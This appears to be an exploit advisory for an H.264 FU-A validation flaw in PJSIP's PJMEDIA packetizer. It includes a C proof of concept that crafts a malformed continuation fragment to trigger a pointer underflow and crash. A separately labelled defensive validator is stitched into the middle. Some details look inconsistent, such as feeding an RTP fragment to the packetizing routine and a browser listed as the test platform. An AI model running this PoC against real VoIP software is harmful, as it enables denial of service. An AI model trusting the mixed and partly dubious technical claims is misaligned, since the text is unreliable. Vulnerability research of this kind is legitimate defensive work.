=============================================================================================================================================
| # Title     : PJSIP PJMEDIA H.264 Improper FU-A State Validation in Packetizer May Lead to Pointer Underflow (DoS)
| # Author    : indoushka
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)
| # Vendor    : https://github.com/pjsip/pjproject/blob/master/pjmedia/include/pjmedia-codec/h264_packetizer.h
=============================================================================================================================================

[+] Summary :

A logical validation flaw was identified in the H.264 packetization routine within the PJMEDIA component of PJSIP. Specifically, insufficient validation of FU-A (Fragmentation Unit – Type A) state handling in pjmedia_h264_packetize() may allow malformed RTP payloads to trigger unsafe pointer arithmetic.

When a crafted FU-A fragment is processed with the Start bit (S) unset and without a valid preceding fragmentation context, the packetizer may compute offsets relative to an assumed NAL start position. In affected versions, improper boundary checks during this calculation can result in pointer underflow, causing out-of-bounds memory access.

Under typical modern memory protections (ASLR/DEP), successful exploitation is most likely limited to Denial of Service via application crash. However, depending on heap layout and runtime conditions, unintended memory reads may occur.
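The state check the summary says is missing, written out as an added defender-side example; it is not PJSIP code and not part of this advisory's PoC, and the names fu_state_t, fu_a_check and the result codes are hypothetical. It validates the FU-A S/E bits against the reassembly context before any offset arithmetic is allowed to run, so a fragment with S=0 and no open fragment (the exact shape of the PoC bytes 0x7C 0x05) is rejected instead of being treated as a continuation:

```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>

#define NAL_TYPE_FU_A 28          /* RFC 6184 payload type for FU-A */

/* Reassembly state that must persist between RTP payloads (hypothetical). */
typedef struct {
    bool    in_fragment;  /* a FU-A start was accepted and its end not yet seen */
    uint8_t nal_type;     /* NAL unit type of the fragment being reassembled */
} fu_state_t;

typedef enum {
    FU_SINGLE,               /* not FU-A: hand to the single-NAL / STAP path */
    FU_START, FU_MIDDLE, FU_END,
    FU_REJECT_SHORT,         /* no room for NAL header + FU header */
    FU_REJECT_ORPHAN,        /* S=0 but no fragment is open (the advisory's case) */
    FU_REJECT_DUP_START,     /* S=1 while a fragment is still open */
    FU_REJECT_BOTH_BITS,     /* S=1 and E=1 together are forbidden by RFC 6184 */
    FU_REJECT_TYPE_CHANGE    /* NAL type differs from the open fragment */
} fu_result_t;

/* Validate one RTP payload against the FU-A state machine before any
 * offset arithmetic is done. Every reject path also clears the state,
 * so a later S=1 fragment can start a clean reassembly. */
fu_result_t fu_a_check(fu_state_t *st, const uint8_t *payload, size_t len)
{
    if (len < 1) return FU_REJECT_SHORT;
    if ((payload[0] & 0x1F) != NAL_TYPE_FU_A) return FU_SINGLE;
    if (len < 2) { st->in_fragment = false; return FU_REJECT_SHORT; }

    uint8_t fu_hdr = payload[1];
    bool s = (fu_hdr & 0x80) != 0;           /* Start bit */
    bool e = (fu_hdr & 0x40) != 0;           /* End bit */
    uint8_t type = fu_hdr & 0x1F;            /* NAL type of the fragmented unit */

    if (s && e) { st->in_fragment = false; return FU_REJECT_BOTH_BITS; }
    if (s) {
        if (st->in_fragment) { st->in_fragment = false; return FU_REJECT_DUP_START; }
        st->in_fragment = true;
        st->nal_type = type;
        return FU_START;
    }
    /* S=0: only legal when a fragment is already open with the same type. */
    if (!st->in_fragment) return FU_REJECT_ORPHAN;
    if (type != st->nal_type) { st->in_fragment = false; return FU_REJECT_TYPE_CHANGE; }
    if (e) { st->in_fragment = false; return FU_END; }
    return FU_MIDDLE;
}
```

A reject result should drop the payload and leave the NAL buffer position untouched; only FU_START, FU_MIDDLE and FU_END may advance it.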
[+] POC :

#include <stdio.h>
#include <pjlib.h>
#include <pjmedia.h>
#include <pjmedia-codec.h>

#define MTU_SIZE     1400
#define PAYLOAD_SIZE 200

int main(void)
{
    pj_caching_pool cp;
    pj_pool_t *pool;
    pjmedia_h264_packetizer *pktz;
    pjmedia_h264_packetizer_cfg cfg;
    pj_status_t status;
    pj_uint8_t malformed_h264[PAYLOAD_SIZE];
    unsigned pos = 0;
    const pj_uint8_t *out_pkt;
    pj_size_t out_pkt_len;

    pj_init();
    pj_caching_pool_init(&cp, NULL, 1024*1024);
    pool = pj_pool_create(&cp.factory, "ExploitPool", 4096, 4096, NULL);

    /* Packetizer config: only mtu and mode are used here. */
    pj_bzero(&cfg, sizeof(cfg));
    cfg.mtu  = MTU_SIZE;
    cfg.mode = PJMEDIA_H264_PACKETIZER_MODE_NON_INTERLEAVED;
    status = pjmedia_h264_packetizer_create(pool, &cfg, &pktz);
    if (status != PJ_SUCCESS) {
        printf("[-] pjmedia_h264_packetizer_create failed: %d\n", status);
        return 1;
    }

    /* Byte 0: FU-A indicator (F=0, NRI=3, type=28).
     * Byte 1: FU header with S=0, E=0, R=0, NAL type=5 (IDR slice),
     *         i.e. a continuation fragment with no preceding start. */
    pj_bzero(malformed_h264, PAYLOAD_SIZE);
    malformed_h264[0] = 0x7C;
    malformed_h264[1] = 0x05;

    printf("[*] Starting Packetization - Target: Pointer Underflow\n");
    status = pjmedia_h264_packetize(pktz, malformed_h264, PAYLOAD_SIZE,
                                    &pos, &out_pkt, &out_pkt_len);
    printf("[+] Process finished (status=%d). If no crash, the system might be protected.\n",
           status);

    pj_pool_release(pool);
    pj_caching_pool_destroy(&cp);
    pj_shutdown();
    return 0;
}

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================